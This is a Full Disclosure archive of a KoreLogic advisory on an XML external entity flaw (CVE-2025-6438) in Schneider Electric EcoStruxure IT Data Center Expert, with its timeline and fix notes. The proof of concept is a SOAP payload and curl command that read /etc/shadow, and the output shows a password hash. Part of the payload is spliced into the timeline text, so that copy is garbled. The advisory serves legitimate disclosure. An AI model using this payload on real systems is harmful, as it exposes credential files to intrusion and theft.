Full Disclosure mailing list archives
From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 9 Jul 2025 17:14:45 -0500
KL-001-2025-006: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection Title: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection Advisory ID: KL-001-2025-006 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-006.txt 1. Vulnerability Details Affected Vendor: Schneider Electric Affected Product: EcoStruxure IT Data Center Expert Affected Version: 8.3 and prior Platform: CentOS CWE Classification: CWE-611: Improper Restriction of XML External Entity Reference CVE ID: CVE-2025-6438 2. Vulnerability Description The "DataExchange" route allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources. 3. Technical Description From an authenticated perspective a user can send SOAP requests to the "/DataExchange/DataExchangeService" web route, providing an XML document in the POST body. When the web application processes the XML it will insecurely resolve entities that reference external resources, such as local files. The "GetHistoryRequest" SOAP action can be utilized to exfiltrate the resolved value by placing the entity reference within the XML document's "Id" parameter. The resulting error message reflects the value of the resolved entity, such as contents of a local file. 4. Mitigation and Remediation Recommendation Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric's Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf. 5. Credit This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2024-11-21 : KoreLogic reports vulnerability details to Schneider Electric CPCERT. 2024-11-22 : Vendor acknowledges receipt of KoreLogic's submission. 2024-12-06 : Vendor confirms the reported vulnerability. 2024-12-12 : Vendor requests a meeting with KoreLogic to discuss the timeline of remediation efforts for this<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.schneider-electric.com/common/dataexchange/2011/05">vulnerability, as well as for associated submissions from KoreLogic. 2024-12-18 : KoreLogic and Schneider Electric agree to embargo vulnerability details until product update 9.0, circa July, 2025. 2025-01-29 : Vendor provides status update. 2025-03-17 : Vendor provides beta release containing remediation for this and other associated vulnerabilities reported by KoreLogic. 2025-06-20 : Vendor notifies KoreLogic that the publication date for this vulnerability will be 2025-07-08. 2025-07-08 : Vendor public disclosure. 2025-07-09 : KoreLogic public disclosure. 7. Proof of Concept [attacker@box]$ cat payload <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/shadow'>]>
<soapenv:Header/> <soapenv:Body> <ns:GetHistoryRequest> <ns:GetHistoryParameter> <ns:Id>&test;</ns:Id> </ns:GetHistoryParameter> <ns:GetHistoryFilter> </ns:GetHistoryFilter> </ns:GetHistoryRequest> </soapenv:Body> </soapenv:Envelope> [attacker@box]$ curl --digest --user kore:logic \ -k https://dce.example.com/DataExchange/DataExchangeService \ -H 'Content-Type: text/xml' --data @payload<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:Body><soap:Fault><faultcode>soap:Client</faultcode><faultstring>Invalid Id</faultstring><detail><Fault_Invalid_Id xmlns="http://www.schneider-electric.com/common/dataexchange/2011/05/DataExchangeInterface/Fault">root:$6$nAQ9/nHfzNJH2Q28$t0.KyJ810alBDwz3NGyEWNGWzQgXdrsUooT1UbXKz9SfpkHLaZngVY6oA8TVCYnCqP2boorvDsmufXawpy1T41:20021:0:99999:7:::
bin:*:19767:0:99999:7::: daemon:*:19767:0:99999:7::: adm:*:19767:0:99999:7::: lp:*:19767:0:99999:7::: mail:*:19767:0:99999:7::: ... The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
Attachment:
OpenPGP_signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- KL-001-2025-006: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection KoreLogic Disclosures via Fulldisclosure (Jul 09)
Related Articles
Stay Informed
Get the best articles every day for FREE. Cancel anytime.